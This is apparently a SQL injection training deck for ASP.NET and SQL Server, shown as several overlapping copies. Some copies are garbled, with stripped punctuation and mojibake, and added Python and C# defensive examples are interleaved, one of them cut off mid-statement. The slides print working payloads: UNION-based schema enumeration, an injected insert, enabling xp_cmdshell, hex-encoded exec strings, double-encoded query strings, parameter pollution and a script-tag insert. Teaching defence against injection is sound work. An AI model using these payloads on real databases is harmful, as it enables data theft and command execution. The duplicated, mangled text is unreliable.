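    """Return {label: (blacklist hit on raw input, hit after canonicalisation)}."""
    return {label: (naive_filter_hits(raw), naive_filter_hits(canonicalise(raw)))
            for label, raw in samples.items()}


if __name__ == "__main__":
    for label, (raw_hit, canon_hit) in compare().items():
        print(f"{label:28s} raw={raw_hit!s:5s} canonical={canon_hit}")
```

Run stand-alone, the three evasion samples are missed on the raw input and caught once canonicalised, while the little old ladies' "Selected" passes both times. The point of the exercise is not that a better blacklist is the fix (the recap says it is not) but that any inspection that does not run on the decoded form is inspecting the wrong string.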
HTTP Parameter Pollution
• In ASP.NET, including a parameter multiple times causes the different entries to be concatenated and separated by commas
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=36&search=jump&search=street
  – Turns into "36,jump,street" in our search
• This can be used for evil
  – Any guesses how?
HTTP Parameter Pollution
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%2F%2A&search=%2A%2F%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – %2F%2A = /*
  – Translates to "select /*,*/ table_schema…", which SQL Server reads as "select table_schema…" because the comma ASP.NET inserted sits inside the comment
HTTP Parameter Pollution
• HTTP Parameter Pollution is something most people don't even think about
  – It doesn't help that different platforms react in different ways: concatenate, ignore all but the last, etc.
Effects On Different Platforms
https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
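To make the platform differences concrete, here is an added Python example (not code from the talk and not the SQLInjectionWorkbench page) that reads a repeated query-string parameter the three ways the slides describe, shows what the database is left with once a block comment is discarded, and provides a defensive accessor that refuses any request in which the parameter appears more than once. The query strings are constructed to mirror the slide's URLs; the function names and the three platform labels are my own.

```python
"""HTTP parameter pollution: the same query string as seen by three
parameter-handling policies, and an accessor that rejects ambiguity.

Added example, not code from the talk. 'concatenate' mirrors the ASP.NET
behaviour the slide describes (all occurrences joined with commas);
'first' and 'last' are the other policies the slide mentions.
"""
import re
from urllib.parse import parse_qs

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def concatenate(values):
    """ASP.NET Request["search"]: every occurrence, comma-joined."""
    return ",".join(values)


def first_only(values):
    return values[0]


def last_only(values):
    return values[-1]


PLATFORMS = {"concatenate": concatenate, "first": first_only, "last": last_only}


def _values(query_string, name):
    """All occurrences of one parameter, percent-decoded, in request order."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [])


def read_param(query_string, name):
    """Return {policy: value the application would see}; {} if absent."""
    values = _values(query_string, name)
    if not values:
        return {}
    return {policy: fn(values) for policy, fn in PLATFORMS.items()}


def as_seen_by_sql(text):
    """What survives once the database discards /* ... */ comments."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub(" ", text)).strip()


def is_ambiguous(query_string, name):
    """True when the parameter was supplied more than once."""
    return len(_values(query_string, name)) > 1


def single_value(query_string, name):
    """Defensive accessor: exactly one occurrence, or reject the request."""
    values = _values(query_string, name)
    if len(values) != 1:
        raise ValueError(f"parameter {name!r} must appear exactly once, got {len(values)}")
    return values[0]


# Constructed query strings modelled on the slide's workbench URLs.
SAMPLE_BENIGN = "search=36&search=jump&search=street"
SAMPLE_COMMENT = "search=select%2F%2A&search=%2A%2F%20table_schema"

if __name__ == "__main__":
    for label, qs in (("benign", SAMPLE_BENIGN), ("comment", SAMPLE_COMMENT)):
        seen = read_param(qs, "search")
        print(label, seen, "->", as_seen_by_sql(seen["concatenate"]))
        print("  ambiguous:", is_ambiguous(qs, "search"))
```

The comma that the concatenating platform inserts is what a naive filter might count on to break up keywords; once it lands inside a comment the database never sees it. A web tier that takes only the first value, or that rejects repeated parameters outright as single_value does, removes the ambiguity before any SQL is built, and parameterising the query (next slides) removes the consequence even if it gets through.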
Doing It Right: Parameterized Queries
• The right way to do it
  – All parameters created using SqlParameter
  – Not necessary to use stored procedures, though in SQL Server this is preferable
• Stored Procedure-Driven Test: not susceptible to SQL injection. You are safe from this issue.
• Secure Query-Driven Test: not susceptible either
Adding Dynamic SQL Into The Mix
• Basic insecure dynamic SP:
  create procedure BadProc
    @Filter nvarchar(500)
  as
    declare @sql varchar(250)
    set @sql = 'select * from table where Name like ''' + @Filter + ''''
    exec(@sql)
• The basic problem is the same as in the query-driven injection example: @Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
• Easy to perform attacks on unprotected dynamic stored procedures from SSMS
• exec BadProc @Filter = 'SHOOOO'' UNION select TABLE_SCHEMA + ''.'' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--'
• Parameterized queries prevent this from being an issue in ASP.NET
Protecting Your Dynamic SPs
• Use sp_executesql
  – Could also use a combo of QUOTENAME and REPLACE
• Include the parameter as a parameter inside the SQL to run
• Example:
  declare @sql nvarchar(max)
  set @sql = N'select ProductSubcategoryID, ProductCategoryID, Name from Production.ProductSubcategory where Name like @Filter'
  exec sp_executesql @sql, N'@Filter varchar(200)', @Filter
• Once you do this, you are completely safe from SQL injection
Recap: What To Do
• Parameterize your queries
  – Use SqlParameter to handle input in ASP.NET
  – Use sp_executesql correctly when you do use dynamic SQL
• Understand your data domain
  – Correct data sizes (not too large)
  – Input field has correct length
  – Regular expressions for well-defined field types (e.g. phone number, Social Security Number)
• Blacklists usually don't work, but whitelists can
• Create limited-access accounts for web applications
• Constraints in UI, business objects, and database
  – Defense in depth
  – This isn't really a violation of DRY
  – If I can beat two of your three checks, the third could still stop me
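The contrast the last few slides draw, between pasting the filter into the statement and binding it as a parameter, can be run end to end in a few lines. The Python example below is added here and is not the talk's ASP.NET or T-SQL code; sqlite3 stands in for SQL Server so that it runs offline with only the standard library, but the lesson is the same one the deck teaches: the naive page concatenates the user's text into the SQL, the secure page binds it (the equivalent of SqlParameter in ASP.NET or the @Filter parameter passed to sp_executesql). It also shows the kind of whitelist regular expression the recap recommends for a well-defined field. The table, its rows and every function name are constructed for this example.

```python
"""Concatenated SQL beside its parameterised form, plus a domain whitelist.

Added example, not the talk's code. sqlite3 is a stand-in for SQL Server;
the vulnerable/parameterised contrast is identical. Rows are constructed.
"""
import re
import sqlite3


def make_db():
    """In-memory stand-in for Production.ProductSubcategory (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table ProductSubcategory ("
        " ProductSubcategoryID integer primary key,"
        " ProductCategoryID integer, Name text)"
    )
    conn.executemany(
        "insert into ProductSubcategory values (?, ?, ?)",
        [(1, 1, "Mountain Bikes"), (2, 1, "Road Bikes"),
         (3, 2, "Helmets"), (4, 3, "Selected Parts")],
    )
    return conn


def search_vulnerable(conn, filter_text):
    """The naive page: the user's text is pasted straight into the statement.
    Anything after a quote becomes SQL, and '--' discards the rest."""
    sql = ("select Name from ProductSubcategory where Name like '"
           + filter_text + "' order by ProductSubcategoryID")
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, filter_text):
    """The bound-parameter form: the text can only ever be a LIKE pattern."""
    sql = ("select Name from ProductSubcategory where Name like ?"
           " order by ProductSubcategoryID")
    return [row[0] for row in conn.execute(sql, (filter_text,))]


# Whitelist for a name search: letters, digits, spaces and the LIKE
# wildcards, 1 to 50 characters. Quotes, comment markers and '=' never pass.
NAME_PATTERN = re.compile(r"[A-Za-z0-9 %_]{1,50}")


def valid_search_term(filter_text):
    return NAME_PATTERN.fullmatch(filter_text) is not None


def demo():
    """Run the deck's first payload and a legitimate search through both paths."""
    conn = make_db()
    payload = "f' OR 1=1--"          # from the 'Having Fun' slide
    return {
        "vulnerable": search_vulnerable(conn, payload),
        "parameterized": search_parameterized(conn, payload),
        "legit_vulnerable": search_vulnerable(conn, "%Bikes"),
        "legit_parameterized": search_parameterized(conn, "%Bikes"),
        "whitelist_payload": valid_search_term(payload),
        "whitelist_legit": valid_search_term("Selected"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22s} {value}")
```

Run it and the payload returns every row through the concatenated path (the WHERE clause collapses to `OR 1=1` and the trailing `order by` is commented out) and no rows through the bound-parameter path, because the database searches for a name literally equal to `f' OR 1=1--`. The legitimate `%Bikes` search behaves identically either way, which is the point: parameterisation costs nothing for honest input. The whitelist is the second layer from the recap, not a replacement for the first.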
Next Steps
• Automation
  – Havij (most popular, easy GUI)
  – Sqlmap (my favorite)
  – BSQL Hacker (blind SQL injection)
  – BBQSQL (Python-based blind SQL injection)
  – Fast-Track (Metasploit module)
  – Plenty more where this came from
• Really evil stuff
Q&A
Kevin Feasel feaselkl@gmail.com
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
• Need a slightly less naïve approach to filtering
• Our developer has a stroke of genius: evil hackers need to use "select" + space, whereas our little old ladies would use "select" without a space. We now have a separating equilibrium!
• Problem: you're doing it wrong
• Proof: SHOOOO' UNION select	TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Yeah, that's a tab (hex 09). Other valid separators: 0A, 0B, 0C, 0D, A0
150 Copy-Pastes Later…
• After adding various permutations of SQL commands + separators…
• declare @shmoo varchar(8000) set @shmoo = CAST(0x73656C656374095441424C455F534348454D41202B20272E27202B205441424C455F4E414D45206173204E616D652C20312061732049734163746976652C203120617320536F72744F726465722066726F6D20494E464F524D4154494F4E5F534348454D412E5441424C4553 as varchar(8000)) exec(@shmoo)
Translating The Varbinary
• select cast('select	TABLE_SCHEMA + ''.'' + TABLE_NAME as Name, 1 as IsActive, 1 as SortOrder from INFORMATION_SCHEMA.TABLES' as varbinary(8000))
• Important note: this won't combine data together
  – Varbinary runs are better for insert/update/delete operations
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<a href="http://www.google.com">Hacker Domain</a>'', newid(), current_timestamp)' as varbinary(8000))
  – Add in undesired links. Hint from Heloise: this looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<script type="text/javascript">alert("A")</script>'', newid(), current_timestamp)' as varbinary(8000))
Querystring Injection
• Helpful table to understand querystring injection

  Hex Code   Character
  09         Tab
  20         Space
  25         %
  27         '
  2B         +
  2C         ,
  2D         -
  2E         .
  3D         =
Querystring Injection
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20or%201%3D1%2D%2D
  – Translates to "bike' or 1=1--"
• The way we did the Slightly Less Naïve Stop actually helps us here by preventing some querystring attacks: http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20union%20select%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – That "select%20" is equivalent to "select "
Querystring Injection
• Injecting other whitespace characters is as easy as %09… or %0A…
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
HTTP Parameter Pollution
• In ASP.NET, including a parameter multiple times causes the different entries to be concatenated and separated by commas
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=36&search=jump&search=street
  – Turns into "36,jump,street" in our search
• This can be used for evil
  – Any guesses how?
HTTP Parameter Pollution
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%2F%2A&search=%2A%2F%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – %2F%2A = /*
  – Translates to "select /*,*/ table_schema…"
HTTP Parameter Pollution
• HTTP Parameter Pollution is something most people don't even think about
  – It doesn't help that different platforms react in different ways: concatenate, ignore all but the last, etc.
Effects On Different Platforms
https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
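To make the querystring and parameter-pollution slides concrete from the defender's side, here is an added example (not code from the talk or its workbench) that runs the talk's own query strings through ASP.NET's parser and reports what a request-time logging or rejection check can see: a parameter supplied more than once, a value that still decodes after ASP.NET's single decoding round (the %2527 trick), and the non-space separators from the "Back To The Drawing Board" slide. It assumes System.Web.HttpUtility is available (.NET Framework, or .NET Core 2.0+), and the class and method names are my own; it is a detection aid, not a replacement for parameterized queries.

```csharp
// Added example: inspect a raw query string the way ASP.NET's Request.QueryString
// sees it, then flag the encoding tricks described in the talk.
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Web;

public static class QueryStringInspector
{
    // The separators from the talk other than a plain space: 09 0A 0B 0C 0D A0.
    private static readonly char[] OddWhitespace = { '\t', '\n', '\v', '\f', '\r', '\u00A0' };

    public sealed class Finding
    {
        public string Canonical { get; set; }            // value after every decoding layer
        public List<string> Reasons { get; } = new List<string>();
    }

    // HttpUtility.ParseQueryString behaves like Request.QueryString: one round of URL
    // decoding, repeated keys kept as separate values, and the indexer joins them with commas.
    public static Finding Inspect(string rawQuery, string name)
    {
        NameValueCollection q = HttpUtility.ParseQueryString(rawQuery);
        var f = new Finding();
        string[] values = q.GetValues(name);
        if (values == null) return f;                    // parameter absent: nothing to report

        if (values.Length > 1)
            f.Reasons.Add("parameter pollution: '" + name + "' supplied " + values.Length + " times");

        // q[name] is the comma-joined string the naive page would have searched on
        // ("36,jump,street" for ?search=36&search=jump&search=street).
        string decoded = q[name];

        // Keep decoding until nothing changes. %2527 -> %27 -> ' needs one extra round;
        // a browser submitting a form never produces that, so treat it as a signal.
        // Uri.UnescapeDataString is used here so a literal '+' is not turned into a space.
        int extraRounds = 0;
        for (;;)
        {
            string next = Uri.UnescapeDataString(decoded);
            if (next == decoded) break;
            decoded = next;
            extraRounds++;
        }
        if (extraRounds > 0)
            f.Reasons.Add("double URL encoding: " + extraRounds + " extra decoding round(s)");

        if (decoded.IndexOfAny(OddWhitespace) >= 0)
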